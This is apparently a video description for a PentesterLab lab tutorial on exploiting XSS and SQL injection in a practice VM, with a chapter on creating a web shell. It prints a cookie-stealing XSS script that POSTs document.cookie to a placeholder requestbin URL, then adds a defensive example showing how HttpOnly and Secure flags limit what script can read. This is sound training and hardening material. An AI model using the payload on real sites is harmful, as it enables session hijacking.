XSS and SQL injection tutorial PentesterLab
http://youtube.com/watch?v=BYJ0AvhLhGs
00:00 Introduction
00:16 Step 1) Download VirtualBox and web app ISO file.
02:18 Step 2) Discover and Exploit XSS vulnerability
05:41 Step 3) Discover and Exploit SQL injection vulnerability
12:40 Step 4) Create Web Shell

This video goes over the XSS and SQL injection tutorial from PentesterLab:
https://pentesterlab.com/exercises/xs...
https://pentesterlab.com/exercises/fr...

Download links:
https://www.virtualbox.org/
https://www.cse.chalmers.se/edu/year/...

XSS script used:

// Get the cookie value
const cookie = document.cookie;
// Create a new XMLHttpRequest object
const xhr = new XMLHttpRequest();
const url = 'your_pipedream_requestbin_url'; // Use HTTP instead of HTTPS
// Open a POST request to the specified URL
xhr.open('POST', url);
// Set the Content-Type header to indicate that the request body contains plain text
xhr.setRequestHeader('Content-Type', 'text/plain');
// Send the cookie as the request body
xhr.send(cookie);

The reason we need to use HTTP instead of HTTPS is that the script on the VM that simulates an admin visiting every webpage is old and does not support HTTPS.
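
The script above sends whatever document.cookie returns, so what it can collect depends on the flags the application put on its cookies. The following is an added example, not from the video or PentesterLab, that models this from the defender's side; the cookie names and values are constructed.

```javascript
// Added example, not from the video. Models which cookies a page script can
// read through document.cookie, given the Set-Cookie headers the server sent.

// Parse one Set-Cookie header into { name, value, httpOnly, secure }.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) return null; // this model skips cookies without a name
  const flags = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  return {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: flags.has('httponly'),
    secure: flags.has('secure'),
  };
}

// The string document.cookie would return on a page loaded over pageScheme.
// HttpOnly cookies are never exposed to script; Secure cookies are not
// exposed on a plain-http page.
function scriptVisibleCookies(setCookieHeaders, pageScheme) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => c !== null && !c.httpOnly)
    .filter((c) => !c.secure || pageScheme === 'https')
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Audit helper: names of cookies that page script could read.
function cookiesMissingHttpOnly(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => c !== null && !c.httpOnly)
    .map((c) => c.name);
}

// Constructed sample headers (assumed names and values, not from the lab app).
const weak = ['session=constructed-abc123; Path=/', 'theme=dark; Path=/'];
const hardened = [
  'session=constructed-abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];

console.log(scriptVisibleCookies(weak, 'http'));
console.log(scriptVisibleCookies(hardened, 'http'));
console.log(cookiesMissingHttpOnly(hardened));
```

With the hardened headers the session cookie never appears in document.cookie, so an injected script has no session value to send.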
